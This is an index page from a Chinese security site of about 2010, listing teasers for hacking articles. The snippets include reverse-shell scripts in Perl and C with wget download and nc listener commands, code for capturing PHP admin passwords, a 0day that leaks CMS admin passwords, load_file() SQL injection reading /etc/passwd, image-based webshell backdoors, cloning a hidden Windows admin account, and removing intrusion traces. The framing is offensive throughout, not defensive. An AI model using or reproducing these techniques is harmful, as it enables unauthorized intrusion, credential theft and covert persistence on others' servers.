-
Linux安全#
织梦CMS的管理员密码加密方式研究及忘记密码的解决办法
- 日期:2010-05-29 点击:345网站主体由DEDECMS搭建,并且加入了UcenterHome的SNS成分。尝试dede后台未果。随便写了些提示V5.31,哦好像不怎么稳定的说。 无意之中闯入某个目录,哪个来着,记不清了(不说就算了)//俺也是为了大家都好,反正把,得到了用户名和密码如下: INSERT INTO `d
-
Linux安全#
linux下用webshell修改文件权限
- 日期:2010-05-29 点击:411当我们拥有了一个linux下的shell(服务器上多个网站)。 这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。 那么,这样的主机设置肯定是不安全的。 有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修
-
Linux安全#
Nginx漏洞扫描程序 perl 代码
- 日期:2010-05-25 点击:372Nginx漏洞扫描程序 perl 代码 #!usr/bin/perl -w use LWP; use LWP::ConnCache; my $browser = LWP::UserAgent-new; $browser-timeout( 15 ); my $conncache = LWP::ConnCache-new; $browser-conn_cache($conncache); #先用列表吧,没有用记事本保存列表再读
-
Linux安全#
STCMS V3.3 暴管理员密码0DAY漏洞
- 日期:2010-05-25 点击:146STCMS V3.3 暴管理员密码0DAY漏洞,STCMS V3.3 漏洞影响版本:STCMS V3.3 STCMS V3.3 漏洞产生原因:
没有过滤$_SERVER,导致用户可以伪造$_SERVER[X-FORWARDED-FOR],从而将恶意注射语句写入数据库
中。
-
Linux安全#
【原创】万能截取php后台登陆密码代码
- 日期:2010-05-25 点击:877拿到webshell之后,想要进一步渗透,诸如discuz的密码,不是直接用md5加密的,破解难度很大。以前帮大头写过一次,昨天小猪大哥正好用到,就又写了一遍。代码比较简单,就几句话,我把原理说的详细点,照顾下对php不太了解有朋友。
-
Linux安全#
linux下反弹shell脚本 C版和Perl版 webshell反弹回命令行
- 日期:2010-05-25 点击:587在线下载 可以用 wget http://www.linuxso.com/linuxexp/shell.c wget http://www.linuxso.com/linuxexp/shell.pl C语言版 用法说明: 在外网linux上监听 nc -l -p 端口 gcc -o shell shell.c ./shell ip 端口 perl版 用法; 在外网linux上监听 nc -l -p 端口
-
Linux安全#
入侵指定网站前的踩点侦察和入侵后的清理痕迹
- 日期:2010-05-22 点击:356入侵指定网站前的踩点侦察和入侵后的清理工作:一直很资深在互联网上潜水,但眼见着黑基、黑白、黑吧等铜味越来越重,红鹰、黑鹰的一个一个没落,邪恶警戒线等固步自封,当然要现在急功近利的时代里,黑客论坛到处都是,但看看都是些年少无知的少年拿着个工具
-
Linux安全#
IIS源码泄露及文件类型解析错误
- 日期:2010-05-21 点击:104漏洞介绍:IIS是微软推出的一款webserver,使用较为广泛,在支持asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题,在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码
-
Linux安全#
windows2003下 手动建立隐藏账户
- 日期:2010-05-20 点击:478windows2003下通过复制注册表值手动克隆管理员账户.
第一步:开始--运行 输入regedit 打开注册表 找到HKEY_LOCAL_MACHINE/SAM/SAM
如果显示为空,说明没有权限 默认system 才有权限 在SAM上点右键选择权限 允许完全控制 和读取 如下图
设置完成之后,重新进入
-
Linux安全#
高级后门--利用图片+CSS留webshell后门
- 日期:2010-05-20 点击:243很在命令行下执行: copy 图片.jpg/b+一句话.txt/b 3.jpg/b C:\Documents and Settings\l\桌面copy 1.jpg/b+1.txt/b 3.jpg/b 1.jpg 1.txt 绑定后,我们传到它网站里, 把原来的图片给替换掉 然后随便找个asp文件 然后插入 div style=height=0px; width=0px; o
-
Linux安全#
利用load_file()获取敏感文件与phpmyadmin拿webshell
- 日期:2010-05-20 点击:636针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)) 上面两个是查看一个PHP文件里
-
Linux安全#
linux下nmap工具的使用,linux下端口扫描
- 日期:2010-05-19 点击:610NMap,也就是Network Mapper,是Linux下的网络扫描和嗅探工 具包,其基本功能有三个,一是探测一组主机是否在线;其次是 扫描主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统 。Nmap可用于扫描仅有两个节点的LAN,直至500个节点以上的网络。
-
Linux安全#
linux下提权反弹脚本
- 日期:2010-05-17 点击:288linux 下提权反弹脚本!代码如下 #!/usr/bin/perl -w # use strict; use Socket; use I:Handle; ($#ARGV+1 != 2){ pr $#ARGV $0 Remote_IP Remote_Port \n; exit 1; } my $remote_ip = $ARGV[0]; my $remote_port = $ARGV[1]; my $proto = getprotobyname(tc
-
Linux安全#
Mysql另类盲注中的一些技巧
- 日期:2010-05-16 点击:196很多技巧从国外的paper学到的,不过国内没有多少人使用,所以发出来,笔记下~ 一、order by 的参数注入技巧: 两种方法,思路都一样。 example. select username,password from uc_members order by.$_GET['oderby'] a.常见的利用方法: 1.[SQL] select user
-
Linux安全#
也谈apache,nginx上传目录无执行权限
- 日期:2010-05-16 点击:454文章作者:Kindle 信息来源:邪恶八进制信息安全团队( www.eviloctal.com ) 至于为什么设置上传目录无权限这个我就不累赘了 现在比较流行的web服务有iis,apache,nginx,使用操作系统无非是windows or *nux 我们来看俩段通常对上传目录设置无权限的列子,配
-
Linux安全#
linux下面也玩arp欺骗与嗅探
- 日期:2010-05-15 点击:189原文来自:chinaitlab.com 算是一个记录过程吧,windows下面玩cain久了,发现他占cpu高,关键是没有命令行的。 今天也碰到个 linux的,直接获得了root密码。上去玩centos的arp欺骗与sniff。(先本地虚拟机里面用federa core 10 测试了)。 用的是dsniff,具体
- 首页
- 上一页
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 下一页
- 末页
- 共 16页311条
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史